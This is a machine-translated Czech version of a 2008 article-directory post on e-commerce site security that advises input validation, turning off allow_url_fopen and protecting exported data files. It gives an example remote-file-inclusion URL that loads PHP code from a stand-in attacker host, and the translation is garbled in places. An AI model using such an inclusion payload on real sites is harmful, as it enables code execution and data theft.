The following content has been automatically translated by close 
E-Commerce Security - Připojení bezpečnostní díry | Elektronický obchod článek
Článek Kulová Logo

E-Commerce Security - Připojení bezpečnostní díry

By Author Expert: Paul Roberts | Článek Abstract
Počet slov: 520 slov | Views: 121 view (s)
Bezpečnost v e-commerce internetových stránkách musí být jedním z nejdůležitějších aspektů při rozvoji e-commerce webové stránky nebo software. Developer musí být vědomi všech bezpečnostních otázek při návrhu webu. S e-commerce stále běžnější v těchto dnech, počet útoků na zabezpečení, je jistě roste. Paranoia je zdravá věc, pro e-commerce site vývojáře, musíme držet krok k bráně s bezpečnostními problémy, a aby naše uši a oči otevřené. Ačkoli tyto mezery jsou závažné, pokud jsou přítomny tyto mezery jsou snadno opravit.

Níže jsou některé bezpečnostní aspekty, které mají být zahrnuty při vývoji webu. Tento článek se nevztahuje na e-krádeže v obchodech, prosím, viz můj samostatný článek o tomto.

Uživatelský vstup - každý vstup, ať již se zadáním množství, vyhledávání produktů, zadáním názvu, atd., musí být ověřena pro podezřelé osoby. Není-li to provést, je možné zadat "?>", uzavírací koncové značky PHP a spustit nějaký kód PHP.

Je mnohem bezpečnější povolit čísel a znaků az (včetně měst) a 0-9 a nic jiného, než vytvořit seznam všech znaků, které by neměly být. Validační skript musí procházet každý znak jeden po druhém. To je třeba dosáhnout s použitím při validaci na straně serveru, nikoliv Javascript. Použití na straně serveru ověřování vstupu je nezbytné, aby se nežádoucí znaky

Existuje další zásadní při provádění PHP kódu. Při použití PHP je nastavení tzv. allow_url_fopen, která umožňuje otevírání souborů z PHP skriptu. Toto nastavení by měly být vypnuty, není absolutně nezbytné.

Jen si představte, máte PHP skripty pro pevné záhlaví a zápatí, a přístup k vaší webové stránky, zadejte příkaz v http://www.mysite.com/index.php?page=page2. Stačí se uživatel se zlými úmysly spustit skript změnou těchto parametrů příkazem "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" s nějaký PHP kód v souboru "hacker.txt". Dalo by se něco stalo, PHP soubory číst, mazat, ukradl důležité informace.

Pokud si nejste jisti, zda je toto nastavení zapnout nebo vypnout, zkopírujte prosím následující PHP kód do textového souboru a nahrát ji na svůj webový server:

phpinfo ();
?>

Přejdete-li váš scénář na svůj webový server, měli byste narazit na nastavení allow_url_fopen v konfiguraci.

Uživatel počítače, může za normálních okolností, které nelze zjistit hodnotu tohoto nastavení.

Buďte opatrní vyvážených data jako příkazy, produkty ve formátu CSV soubory a mySQL. Je-li tato data se vyváží ze skript a je veden na webovém serveru pod společnou tj. název souboru. http://www.mysite.com/admin/output_tables.csv. To je jen opravdu problém, když vyvážené data uložena v souboru v adresáři, který je veřejně přístupný. K dispozici jsou dva způsoby, jak zabránit této bezpečnostní riziko - První výstupní soubor má za sebou adresář chráněný heslem, za druhé se data nacházejí uvnitř formuláře HTML textarea element na skript. Majitel obchodu pak zkopírovat informace z textového souboru a vytvořte nový soubor na svém počítači a vložte informace najdete zde.

Stačí hacker najít tento soubor kontrolou z e-commerce software demo internetové stránky a podívejte se stejným názvem na skutečném místě.
Paul Roberts

O autorovi / Autor Bio

Paul Roberts
Vedu software specializující se na e-Commerce, optimalizace pro vyhledávače, tisk a software pro odhad tzv. ROBO Design Solutions. Také jsem rozvíjet Nový Zéland e-commerce řešení a softwaru pod názvem ROBO Design.

Article Source: http://www.cs.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Submitted: 2008-06-05 | This Article has been viewed 121 times.

Rate Article

Related Videos

How to Strengthen Network Security with Cisco Network Manager
Understanding your Home Network Router #5 - Secure Your Network with WPA2
Learn About Secure Computing
Jak na Keep Your Computer Bezpečná
Jak Zkontrolujte nastavení zabezpečení v systému Windows Vista

Více "Elektronický obchod" Související články

Níže uvedené jsou více článků, související s výše uvedeným článkem z "Elektronický obchod" článek kategorie.

Zájemci v uvedeném článku "E-Commerce Security - Připojení bezpečnostní díry" jsou také zájem na související články uvedené níže:

Spuštění e-commerce podnikání není jen o udržení své webové stránky v provozu. Zákazníci spoléhají na vaši schopnost sloužit jim prostřednictvím telefonu, faxu, e-mail, nebo jinými prostředky, a to vyžaduje, aby všechny své systémy, které budou pracovat, aby mohla plnit požadavky zákazníků.
Jen pár dní zpátky jsem měl rozhovor s mým přítelem. Byl slaví své 1. narozeniny dítěte a musel běžet mezi své rodné v Kerala a Chennai, jeho pracovní místo. On a jeho lepší polovička cestoval mezi těmito místy alespoň 4 krát za poslední měsíc.
Jestliže jste dělala e-commerce pro jakékoli množství času, měli byste vědět, že existuje více než skutečné scamers poskytovatele velkoobchodních služeb dropship adresáře. Ve světě e-business, Salehoo světových značek jsou oba seriózní poskytovatelé služeb, které získaly popularitu v posledních několika letech.
Pokud jste někdy byli on-line prodejce, pravděpodobně jste již slyšeli o Salehoo nebo dokonce použít i ve svůj prospěch. Pokud jste právě začínáte s vaším podnikáním, ty by mohly být zaměněny s smíšeným Salehoo nám tam venku. Nyní, pojďme se podívat na to, co Salehoo je opravdu všude a služeb, které nabízejí, kterou mnozí mají tendenci přehlížet.
Kolik lidí to víš, že si koupil něco, co on-line? Pokud váš like me docela málo, to je důvod, proč elektronického obchodování, je na světě nový on-line nákupní centrum. Ale kdo provozuje tyto on-line maloobchodních prodejen? Lidé jako vy a já, to je důvod, proč toto podnikání je na vzestupu a bude nadále vzkvétat a nyní i do budoucna.
Pokud jste velkým fanouškem nejmodernějších elektronických výrobků, možná vás bude lákat myšlenka provozovat vlastní elektroniku on-line. Není to tak těžké, jak začít, když budete mít plně využívat práva pokles lodní elektroniky služby a existuje spousta na kterých si můžete vybrat.
Už jste někdy jít do místní samoobsluze, a klást otázku, co by to bylo, když jej vlastnili? Chcete být dobrým vlastníkem, budou lidi, jako jste vy? No tento článek vám ukáže, výhody vlastnit svůj vlastní on-line obchodě, nebo běžně známý jako e-commerce, které se liší od skutečného místní samoobsluze.
Článek Directory Home Všechny kategorie Internet a e-business Elektronický obchod

Nemůžete najít, co hledáte? Zkuste Google Search!
Copyright © 2005 -- Larry Lim, Singapur - Článek vyhledávače Directory na ArticleSphere.com ™
All Rights Reserved Worldwide. Všechny ochranné známky a servisní jsou majetkem příslušných vlastníků.

Afrikánština Albánština Arabština Běloruština Bulharština Katalánština Čínština (zjednodušená) Čínština (tradiční) Chorvatština Čeština Dánština Němčina Angličtina Estonština Tagalogština Finština Francouzština Haličština Řecký Hebrejština Hindština Maďarština Islandština Indonéština Irština Italiano Japonština Korejština Lotyština Litevština Makedonština Malajsky Maltština Nizozemština Norština Perština Polština Portugalština Rumunština Ruština Srbština Slovenština Slovinština Španělština Svahilština Švédština Thajská Turečtina Ukrajinština Vietnamština Velština Jidiš